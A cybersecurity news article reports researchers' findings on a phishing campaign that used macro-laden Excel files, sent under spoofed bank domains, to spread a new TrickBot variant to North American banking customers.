An spam-based phishing campaign recently targeted North American banking customers with malicious Excel documents designed to infect victims with a new variant of the information-stealing TrickBot banking trojan, researchers reported earlier this week.
The scam dates back to at least Jan. 27 and peaked in volume on Jan. 30, according a new blog post from Blue Hexagon, a brand-new deep-learning cybersecurity firm that launched just this past Tuesday, Feb. 5.
Blog authors Irfan Asrar and Mehdi Ansari report that the spam emails featured fake domains that at first glance appear to be from JPMorgan Chase and Bank of America. If recipients were to open the Excel file and enable macros, they document would then download the TrickBot payload, retrieving it from one of several compromised legitimate websites, including the official sites of a Canadian CPA firm and the Jamaica Beach Police Department in Galveston County, Texas. (Blue Hexagon informed site administrators of the compromise.)
“Compared to previous campaigns, there is a distinct shift in tactics,” the blog post states. “There has always been a unique focus on European banks by TrickBot more than North American banks, but after a few days of monitoring, we still have not seen the new campaign move into Europe.”
This version of TrickBot observed in this campaign has evolved from its predecessors in that it is now capable of stealing credentials for cryptocurrency wallets and also uses a different encryption technique to protect the PowerShell used by the malicious macro. “The encryption technique was a slight shift in the use of Base64 encryption, which likely was meant to complicate reverse engineering attempts, not to mention also thwart detection techniques based on signature detection, etc.,” said Asrar, senior threat analyst, in an interview with SC Media.
“Additionally, we see new functionality that appears to target POS systems; this is a testament to the business tactics behind the people running TrickBot They are always looking to expand the platform to ensure profitability. Definitely not your average cyber criminal.”
Asrar also told SC that Blue Hexagon has since observed another new campaign specifically targeting Canadian banks and their customers. “It would seem TrickBot is further entrenching itself into North America,” said Asrar.